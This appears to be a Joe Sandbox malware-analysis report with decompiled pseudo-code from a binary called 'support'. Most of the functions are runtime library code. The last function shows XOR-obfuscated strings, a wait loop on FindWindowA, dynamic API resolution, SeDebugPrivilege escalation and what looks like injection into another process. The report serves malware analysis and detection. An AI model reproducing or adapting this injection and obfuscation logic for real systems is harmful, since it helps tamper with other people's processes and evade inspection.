Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: Console$FillOutput$AttributeBufferCharacterCursorHandleInfoPositionScreen
String ID: [^K/
API String ID: 297209093-4166871755
Opcode ID: 2e1aa99ec09fbbe7f4e57d8f8b83b3f4f52f8c9b2e8ffcadeeb7b49b5cac9c32
Instruction ID: 93637005618f972f565605b7a807db96451d789c3e17d4734574c127923e38d3
Opcode Fuzzy Hash: 2e1aa99ec09fbbe7f4e57d8f8b83b3f4f52f8c9b2e8ffcadeeb7b49b5cac9c32
Instruction Fuzzy Hash: DE01217690026CABCB119FA59D89CEFBBBCFB4A721F000556F906E2151DA34A944DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 003BE3E1 Relevance: 6.0, APIs: 4, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E003BE3E1(int _a4) {
				signed int _v12;
				signed int _v16;
				void* _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _t24;
				signed int _t28;
				char* _t31;
				void* _t47;
				void* _t48;
				void* _t52;
				void* _t53;

				while(1) {
					_t24 = malloc(_a4); // executed
					if(_t24 != 0) {
						break;
					}
					_push(_a4);
					L003BF2E5();
					if(_t24 == 0) {
						if(_a4 != 0xffffffff) {
							_push(_t47);
							_t47 = _t52;
							_t52 = _t52 - 0xc;
							E003BECA7( &_v20);
							_push(0x3c3694);
							_push( &_v20);
							L003BF2CD();
							asm("int3");
						}
						_push(_t47);
						_t48 = _t52;
						_t53 = _t52 - 0xc;
						E003BECDA( &_v20);
						_push(0x3c36cc);
						_push( &_v20);
						L003BF2CD();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(E003BEDCB);
						_push( *[fs:0x0]);
						_v20 = _t48;
						_t28 =  *0x3c500c; // 0x4b5ee95b
						_v12 = _v12 ^ _t28;
						_push(_t28 ^  &_v20);
						_v32 = _t53 - _v20;
						_push(_v16);
						_v12 = 0xfffffffe;
						_v16 = _v12;
						_t31 =  &_v24;
						 *[fs:0x0] = _t31;
						asm("repne ret");
						 *[fs:0x0] = _v24;
						_pop(_t40);
						_pop(_t50);
						asm("repne ret");
						_push(_v40);
						_push(_v44);
						_push(_v48);
						_push(_v52);
						_push(E003BE3D0);
						_push("[\xef\xbf\x						L003BF2D3();
						return _t31;
					} else {
						continue;
					}
					L11:
				}
				return _t24;
				goto L11;
			}

0x003be3f3
0x003be3f6
0x003be3fe
0x00000000
0x00000000
0x003be3e6
0x003be3e9
0x003be3f1
0x003be406
0x003bed30
0x003bed31
0x003bed33
0x003bed39
0x003bed3e
0x003bed46
0x003bed47
0x003bed4c
0x003bed4c
0x003bed4d
0x003bed4e
0x003bed50
0x003bed56
0x003bed5b
0x003bed63
0x003bed64
0x003bed69
0x003bed6a
0x003bed6b
0x003bed6c
0x003bed6d
0x003bed6e
0x003bed6f
0x003bed70
0x003bed75
0x003bed80
0x003bed8d
0x003bed92
0x003bed97
0x003bed98
0x003bed9b
0x003beda1
0x003beda8
0x003bedab
0x003bedae
0x003bedb4
0x003bedb9
0x003bedc0
0x003bedc7
0x003bedc9
0x003bedce
0x003bedd1
0x003bedd4
0x003bedd7
0x003bedda
0x003beddf
0x003bede4
0x003beded
0x00000000
0x00000000
0x00000000
0x00000000
0x003be3f1
0x003be401
0x00000000

APIs

_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(006F5B9C,?,003B5E90,00000000,?,006F5B9C), ref: 003BE3E9
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(006F5B9C,?,003B5E90,00000000,?,006F5B9C), ref: 003BE3F6
_CxxThrowException.VCRUNTIME140(?,003C3694,?), ref: 003BED47
_CxxThrowException.VCRUNTIME140(?,003C36CC,?), ref: 003BED64

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: ExceptionThrow$_callnewhmalloc
String ID:
API String ID: 4113974480-0
Opcode ID: 1bb77fa677cecb418c40e7aac705ccffa12663d7f1b3726ccad5b10b1a75db6c
Instruction ID: db7c6dbfb59fa1225ae0ddf4f29fbe2fe7f3b93f229cfc7d60b2e93742b380d6
Opcode Fuzzy Hash: 1bb77fa677cecb418c40e7aac705ccffa12663d7f1b3726ccad5b10b1a75db6c
Instruction Fuzzy Hash: F4F0303C80020D7BCB06B6ADEC469DD776C6910318B609A35FB24DACE5EBB09A558694

Uniqueness

Uniqueness Score: -1.00%

Function 003BE7BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E003BE7BD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v0;
				void* _t3;
				signed int _t8;

				E003BE801(__ebx, __edx, __edi, __esi); // executed
				_t3 = E003BE5BE(__edx, 0);
				_t24 = _t3;
				if(_t3 == 0) {
					E003BEF95(__edx, __edi, __esi, 7);
					asm("int3");
					_push(0x20);
					asm("ror eax, cl");
					_t8 = _v0 ^  *0x3c500c;
					__eflags = _t8;
					return _t8;
				} else {
					E003BE777(_t24, "ht_o");
					return 0;
				}
			}

0x003be7bd
0x003be7c4
0x003be7ca
0x003be7cc
0x003be7de
0x003be7e3
0x003be7ef
0x003be7f7
0x003be7f9
0x003be7f9
0x003be800
0x003be7ce
0x003be7d3
0x003be7db
0x003be7db

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003BE7BD

Part of subcall function 003BE801: InitializeCriticalSectionAndSpinCount.KERNEL32(006F5F74,00000FA0,4B5EE95B,?,?,?,?,003BFFAA,000000FF,?,003BE7C2), ref: 003BE830
Part of subcall function 003BE801: GetModuleHandleW.KERNELBASE(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003BFFAA,000000FF,?,003BE7C2), ref: 003BE83B
Part of subcall function 003BE801: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003BFFAA,000000FF,?,003BE7C2), ref: 003BE84C
Part of subcall function 003BE801: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003BE862
Part of subcall function 003BE801: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003BE870
Part of subcall function 003BE801: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003BE87E
Part of subcall function 003BE801: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003BE8A9
Part of subcall function 003BE801: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003BE8B4

___scrt_fastfail.LIBCMT ref: 003BE7DE

Part of subcall function 003BE777: __onexit.LIBCMT ref: 003BE77D

Strings

ht_o, xrefs: 003BE7CE

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: ht_o
API String ID: 66158676-1812004142
Opcode ID: e883b36a4691980b74c0255450a9652f1cc3cc4807380a8e9f9d5ec29427b7d5
Instruction ID: bcac3ff10a551fd7f8721ec399e535d112c70f60aae29f58d30e10aa865a3c54
Opcode Fuzzy Hash: e883b36a4691980b74c0255450a9652f1cc3cc4807380a8e9f9d5ec29427b7d5
Instruction Fuzzy Hash: 19C09B4525470516D81B7ABC5C5B7D916020F01F2FF254855F754DDDC3DE45C0801035

Uniqueness

Uniqueness Score: -1.00%

Function 003B51D0 Relevance: 4.6, APIs: 3, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memmove.VCRUNTIME140(006F5B9C,?,?), ref: 003B51FD
memcpy.VCRUNTIME140(00000000,?,?), ref: 003B52AC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003B52F9

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemcpymemmove
String ID:
API String ID: 3624149045-0
Opcode ID: 8a04d178e2c48e0a96c6e0f26cdc88454d71f91343fe1a3ac564cdecfb9cb9d9
Instruction ID: a193aaf0f7cc0e0e21c998e693a679f1b89add140d413e3b56e227c2493840c2
Opcode Fuzzy Hash: 8a04d178e2c48e0a96c6e0f26cdc88454d71f91343fe1a3ac564cdecfb9cb9d9
Instruction Fuzzy Hash: 473125317016004BD71A9E7C9C85AADB7E8EF88324B200B3EEA66CBBD1D77099448751

Uniqueness

Uniqueness Score: -1.00%

Function 003B5660 Relevance: 4.5, APIs: 3, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(0000000A), ref: 003B5670
?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@D@Z.MSVCP140 ref: 003B567C
?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140 ref: 003B5684

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@U?$char_traits@$V12@$?flush@?$basic_ostream@?put@?$basic_ostream@?widen@?$basic_ios@
String ID:
API String ID: 1875450691-0
Opcode ID: 307878e16d07b2d8ba5816aa7e79d2619c12d24cf5dff15ceb7213864176c039
Instruction ID: cd220ca8eab695c0a3c20229872be8ed071e597acc6cf7e5923a95f37935e1d0
Opcode Fuzzy Hash: 307878e16d07b2d8ba5816aa7e79d2619c12d24cf5dff15ceb7213864176c039
Instruction Fuzzy Hash: E5D05B353001345BC7055B49EC18DAD77DDEB49755F004009FA4BC7352CF25795197D6

Uniqueness

Uniqueness Score: -1.00%

Function 003B31F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E003B31F0(intOrPtr __ecx, signed int __edx, intOrPtr _a4, char _a8, int _a24, intOrPtr _a28) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _t19;
				char* _t23;
				intOrPtr _t25;
				void** _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t39;
				signed int _t41;

				_push(0xffffffff);
				_push(E003BF403);
				_push( *[fs:0x0]);
				_t19 =  *0x3c500c; // 0x4b5ee95b
				_push(_t19 ^ _t41);
				 *[fs:0x0] =  &_v16;
				_t39 = __ecx;
				_v20 = __ecx;
				_v24 = __ecx;
				_t31 = __ecx + 4;
				_v8 = 0;
				 *((intOrPtr*)(_t31 + 0x10)) = 0;
				 *((intOrPtr*)(_t31 + 0x14)) = 0xf;
				 *_t31 = 0;
				_v8 = 1;
				 *((intOrPtr*)(__ecx)) = _a4;
				_t23 =  &_a8;
				if(_t31 != _t23) {
					_t28 =  >=  ? _a8 : _t23;
					E003B51D0(_t31, __edx,  >=  ? _a8 : _t23, _a24); // executed
				}
				_t36 = _a28;
				if(_t36 >= 0x10) {
					_t34 = _a8;
					_t37 = _t36 + 1;
					_t25 = _t34;
					if(_t37 >= 0x1000) {
						_t34 =  *((intOrPtr*)(_t34 - 4));
						_t37 = _t37 + 0x23;
						if(_t25 > 0x1f) {
							__imp___invalid_parameter_noinfo_noreturn();
						}
					}
					_push(_t37);
					E003BE78C(_t25, _t34);
				}
				 *[fs:0x0] = _v16;
				return _t39;
			}

0x003b31f3
0x003b31f5
0x003b3200
0x003b3205
0x003b320c
0x003b3210
0x003b3216
0x003b3218
0x003b321b
0x003b321e
0x003b3221
0x003b3228
0x003b322f
0x003b3236
0x003b323c
0x003b3240
0x003b3242
0x003b3247
0x003b3250
0x003b3255
0x003b3255
0x003b325a
0x003b3260
0x003b3262
0x003b3265
0x003b3266
0x003b326e
0x003b3270
0x003b3273
0x003b327e
0x003b3280
0x003b3280
0x003b327e
0x003b3286
0x003b3288
0x003b328d
0x003b3295
0x003b32a1

APIs

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(4B5EE95B,?), ref: 003B3280

Part of subcall function 003B51D0: memmove.VCRUNTIME140(006F5B9C,?,?), ref: 003B51FD

Strings

[^K/, xrefs: 003B3205

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemmove
String ID: [^K/
API String ID: 4032823789-4166871755
Opcode ID: 988d23246d152579541b0aa04953cd613aa3150e2b86e20e364e46ab690e1a27
Instruction ID: a44707d276794a144ffe42154fe10333380d4711dcb09039f5a6bf90bc0ac17a
Opcode Fuzzy Hash: 988d23246d152579541b0aa04953cd613aa3150e2b86e20e364e46ab690e1a27
Instruction Fuzzy Hash: F411B171500218EBDB06CF58CD44BDEBBA8EB49318F20861EF911CB681D776EA40CB90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003B7610 Relevance: 56.3, APIs: 19, Strings: 13, Instructions: 347
sleeplibraryloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 64%

			E003B7610(void* __ebx, char __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v10;
				char _v12;
				long _v16;
				signed char _v20;
				struct _TOKEN_PRIVILEGES _v28;
				char _v31;
				signed int _v32;
				char _v35;
				signed int _v36;
				char _v39;
				signed int _v40;
				char _v43;
				signed char _v44;
				signed char _v45;
				signed char _v46;
				signed char _v47;
				signed char _v49;
				signed char _v50;
				char _v51;
				struct _LUID _v52;
				char _v55;
				signed char _v56;
				signed char _v57;
				signed char _v58;
				signed char _v59;
				int _v60;
				signed char _v61;
				signed char _v62;
				char _v63;
				signed int _v64;
				long _v68;
				char _v71;
				short _v72;
				int _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				char _v96;
				char _v99;
				signed int _v100;
				void* _v104;
				void* _v108;
				char _v109;
				char _v114;
				short _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v127;
				signed char _v128;
				char _v130;
				char _v131;
				char _v132;
				char _v133;
				char _v134;
				char _v135;
				char _v136;
				signed int _t137;
				signed char _t143;
				void* _t151;
				_Unknown_base(*)()* _t158;
				long _t171;
				signed char _t174;
				signed char _t194;
				signed char _t200;
				signed char _t207;
				signed char _t212;
				signed char _t218;
				signed char _t244;
				signed char _t248;
				char _t250;
				void* _t254;
				void* _t256;
				char _t259;
				char* _t260;
				signed char _t265;
				void* _t268;
				struct HWND__* _t271;
				signed int _t272;
				void* _t273;
				signed int _t275;

				_t137 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t137 ^ _t275;
				_t268 = Sleep;
				_v109 = __ecx;
				Sleep(0x7d0);
				_v52.LowPart = 0x37;
				_v51 = 0x52;
				_t143 = _v52.LowPart ^ _v52.LowPart;
				_v43 = 0;
				_v47 = _t143;
				_v43 = 0;
				_t248 = 0x00000056 ^ _t143;
				_t212 = 0x0000005b ^ _t143;
				_v50 = _t248;
				_t200 = 0x00000006 ^ _t143;
				_v49 = _t212;
				_v52.HighPart = _t200;
				_v46 = _t212 ^ _t143;
				_v45 = _t248 ^ _t143;
				_v44 = _t200 ^ _t143;
				_t271 = FindWindowA( &_v51, 0);
				_v68 = 0;
				while(_t271 == 0) {
					_v64 = 0x15;
					_v63 = 0x70;
					_t194 = _v64 ^ _v64;
					_v55 = 0;
					_v59 = _t194;
					_v55 = 0;
					_t244 = 0x00000074 ^ _t194;
					_t265 = 0x00000079 ^ _t194;
					_v62 = _t244;
					_t207 = 0x00000024 ^ _t194;
					_v61 = _t265;
					_v60 = _t207;
					_v58 = _t244 ^ _t194;
					_v57 = _t265 ^ _t194;
					_v56 = _t207 ^ _t194;
					_t271 = FindWindowA( &_v63, 0);
					Sleep(0x64);
				}
				GetWindowThreadProcessId(_t271,  &_v68);
				if(_v68 == 0) {
					L34:
					return E003BE3D0(_v8 ^ _t275);
				} else {
					asm("movaps xmm0, [0x3c1ec0]");
					_t250 = 0;
					asm("movups [ebp-0x60], xmm0");
					_v84 = 0x2f7c7c6a;
					_v80 = 0x6b616e67;
					_v76 = 0x21216a63;
					_v72 = 0x21;
					do {
						 *(_t275 + _t250 - 0x5f) =  *(_t275 + _t250 - 0x5f) ^ _v100;
						_t250 = _t250 + 1;
					} while (_t250 < 0x1c);
					_v71 = 0;
					E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v99);
					__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
					_t272 = _v68;
					_t218 = 0x1d;
					_v128 = 0x5269531d;
					_t151 = 0;
					_v124 = 0x4d73786d;
					_v120 = 0x787e726f;
					_v116 = 0x6e6e;
					_v114 = 0;
					while(1) {
						 *(_t275 + _t151 - 0x7b) =  *(_t275 + _t151 - 0x7b) ^ _t218;
						_t151 = _t151 + 1;
						if(_t151 >= 0xd) {
							break;
						}
						_t218 = _v128;
					}
					_v130 = 0;
					_v114 = 0;
					_v136 = 8;
					_v130 = 0;
					_v135 = 0x66;
					_v131 = 0x66;
					_v134 = 0x74;
					_v133 = 0x6c;
					_v132 = 0x10;
					_t158 = GetProcAddress(LoadLibraryA( &_v135),  &_v127);
					_v64 = _t272;
					_v60 = 0;
					_v96 = 0x18;
					_v92 = 0;
					_v84 = 0;
					_v88 = 0;
					_v80 = 0;
					_v76 = 0;
					_v104 = 0;
					SetLastError( *_t158( &_v104, 0x43a,  &_v96,  &_v64));
					_t273 = _v104;
					if(_t273 == 0) {
						L21:
						 *0x537e28 = 2;
						return E003BE3D0(_v8 ^ _t275);
					} else {
						asm("movaps xmm0, [0x3c1ee0]");
						_t254 = 0;
						asm("movups [ebp-0x1c], xmm0");
						_v16 = 0x2c66636d;
						_v12 = 0x2c2c;
						_v10 = 0;
						do {
							 *(_t275 + _t254 - 0x1b) =  *(_t275 + _t254 - 0x1b) ^ _v32;
							_t254 = _t254 + 1;
						} while (_t254 < 0x15);
						_v10 = 0;
						E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v31);
						__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
						if( *0x6f6364 == 0) {
							if(OpenProcessToken(GetCurrentProcess(), 0x20,  &_v108) != 0 && LookupPrivilegeValueA(0, "SeDebugPrivilege",  &_v52) != 0) {
								_v28.Privileges = _v52.LowPart;
								_v20 = _v52.HighPart;
								_v28.PrivilegeCount = 1;
								_v16 = 2;
								AdjustTokenPrivileges(_v108, 0,  &_v28, 0x10, 0, 0);
							}
							asm("movaps xmm0, [0x3c16d0]");
							_t256 = 0;
							asm("movups [ebp-0x24], xmm0");
							_v28.Privileges = 0x43170d06;
							_v20 = 0x11010a0f;
							_v16 = 0x4d1a1102;
							_v12 = 0x4d4d;
							_v10 = 0;
							do {
								 *(_t275 + _t256 - 0x23) =  *(_t275 + _t256 - 0x23) ^ _v40;
								_t256 = _t256 + 1;
							} while (_t256 < 0x1d);
							_v10 = 0;
							E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,  &_v39);
							__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
							if(E003B6F80(0x10, _t273, _v68, _t268, _t273) != 0) {
								_t204 = _v109;
								_t259 = 0;
								if(_v109 != 0) {
									asm("movaps xmm0, [0x3c1a40]");
									asm("movups [ebp-0x20], xmm0");
									_v20 = 0xc214024;
									_v16 = 0x4e010810;
									_v12 = 0x4e4e;
									_v10 = 0;
									do {
										 *(_t275 + _t259 - 0x1f) =  *(_t275 + _t259 - 0x1f) ^ _v36;
										_t259 = _t259 + 1;
									} while (_t259 < 0x19);
									_v10 = 0;
									_t260 =  &_v35;
								} else {
									asm("movaps xmm0, [0x3c1eb0]");
									asm("movups [ebp-0x1c], xmm0");
									_v16 = 0x12121278;
									_v12 = 0;
									do {
										 *(_t275 + _t259 - 0x1b) =  *(_t275 + _t259 - 0x1b) ^ _v32;
										_t259 = _t259 + 1;
									} while (_t259 < 0x13);
									_v12 = 0;
									_t260 =  &_v31;
								}
								E003B5420(__imp__?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, _t260);
								__imp__??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z(E003B5660);
								if( *0x537e28 != 2) {
									if( *0x6f6364 == 0) {
										E003B7540(_t204);
									}
									_t262 =  ==  ? 0x47de28 : 0x3c5028;
									_t174 = E003B66C0(_t204, _t273,  ==  ? 0x47de28 : 0x3c5028, _t268, _t273);
									asm("sbb eax, eax");
									 *0x537e28 =  ~(_t174 & 0x000000ff) + 2;
									E003B7540(_t204);
								}
								CloseHandle(_t273);
								_t171 =  *0x537e28; // 0xffffffff
								_t172 =  ==  ? 0 : _t171;
								 *0x537e28 =  ==  ? 0 : _t171;
								goto L34;
							} else {
								CloseHandle(_t273);
								goto L21;
							}
						} else {
							CloseHandle(_t273);
							 *0x537e28 = 1;
							return E003BE3D0(_v8 ^ _t275);
						}
					}
				}
			}

0x003b7619
0x003b7620
0x003b7626
0x003b7631
0x003b7634
0x003b763e
0x003b7649
0x003b7653
0x003b7655
0x003b765b
0x003b7660
0x003b7666
0x003b7668
0x003b766a
0x003b766d
0x003b766f
0x003b7674
0x003b7679
0x003b767e
0x003b7686
0x003b768c
0x003b768e
0x003b7697
0x003b76a8
0x003b76b3
0x003b76bd
0x003b76bf
0x003b76c5
0x003b76ca
0x003b76d0
0x003b76d2
0x003b76d4
0x003b76d7
0x003b76d9
0x003b76de
0x003b76e3
0x003b76e8
0x003b76f0
0x003b76f8
0x003b76fa
0x003b76fc
0x003b7705
0x003b770f
0x003b7a9a
0x003b7aaa
0x003b7715
0x003b7715
0x003b771c
0x003b771e
0x003b7722
0x003b7729
0x003b7730
0x003b7737
0x003b7740
0x003b7743
0x003b7747
0x003b7748
0x003b7756
0x003b775a
0x003b7766
0x003b776c
0x003b776f
0x003b7771
0x003b7778
0x003b777a
0x003b7781
0x003b7788
0x003b778e
0x003b7792
0x003b7792
0x003b7796
0x003b779a
0x00000000
0x00000000
0x003b779c
0x003b779c
0x003b77a3
0x003b77a9
0x003b77af
0x003b77b7
0x003b77c1
0x003b77c9
0x003b77d6
0x003b77de
0x003b77e5
0x003b77f3
0x003b77fc
0x003b7803
0x003b7813
0x003b781b
0x003b7822
0x003b7829
0x003b7830
0x003b7837
0x003b783e
0x003b7848
0x003b784e
0x003b7853
0x003b7996
0x003b7996
0x003b79b0
0x003b7859
0x003b7859
0x003b7860
0x003b7862
0x003b7866
0x003b786d
0x003b7873
0x003b7877
0x003b787a
0x003b787e
0x003b787f
0x003b788d
0x003b7891
0x003b789d
0x003b78aa
0x003b78e3
0x003b7901
0x003b7909
0x003b7915
0x003b791c
0x003b7923
0x003b7923
0x003b7929
0x003b7930
0x003b7932
0x003b7936
0x003b793d
0x003b7944
0x003b794b
0x003b7951
0x003b7955
0x003b7958
0x003b795c
0x003b795d
0x003b796b
0x003b796f
0x003b797b
0x003b798d
0x003b79b1
0x003b79b4
0x003b79b8
0x003b79e6
0x003b79ed
0x003b79f1
0x003b79f8
0x003b79ff
0x003b7a05
0x003b7a10
0x003b7a13
0x003b7a17
0x003b7a18
0x003b7a1d
0x003b7a21
0x003b79ba
0x003b79ba
0x003b79c1
0x003b79c5
0x003b79cc
0x003b79d0
0x003b79d3
0x003b79d7
0x003b79d8
0x003b79dd
0x003b79e1
0x003b79e1
0x003b7a2a
0x003b7a36
0x003b7a43
0x003b7a4c
0x003b7a50
0x003b7a50
0x003b7a63
0x003b7a66
0x003b7a72
0x003b7a77
0x003b7a7c
0x003b7a7c
0x003b7a82
0x003b7a88
0x003b7a92
0x003b7a95
0x00000000
0x003b798f
0x003b7990
0x00000000
0x003b7990
0x003b78ac
0x003b78ad
0x003b78b3
0x003b78cd
0x003b78cd
0x003b78aa
0x003b7853

APIs

Sleep.KERNEL32(000007D0,76C86490,75BC4AF0,00000001), ref: 003B7634
FindWindowA.USER32(?,00000000), ref: 003B768A
FindWindowA.USER32(?,00000000), ref: 003B76F4
Sleep.KERNEL32(00000064), ref: 003B76FA
